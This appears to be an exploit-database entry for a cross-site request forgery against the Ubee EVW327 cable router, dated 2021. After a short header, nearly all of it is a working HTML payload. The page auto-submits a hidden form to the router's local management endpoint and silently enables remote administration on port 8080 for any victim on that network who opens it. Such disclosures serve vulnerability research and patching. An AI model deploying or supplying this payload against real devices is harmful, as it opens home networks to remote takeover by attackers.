# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) # Date: 2021-05-30 # Exploit Author: lated # Vendor Homepage: https://www.ubeeinteractive.com # Version: EVW327 <html> <body> <form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST"> <input type="hidden" name="RemoteAccessEnable" value="1"/> <input type="hidden" name="RemoteAccessPort" value="8080"/> <input type="hidden" name="ApplyRemoteEnableAction" value="1"/> </form> <script> document.forms[0].submit(); </script> </body> </html>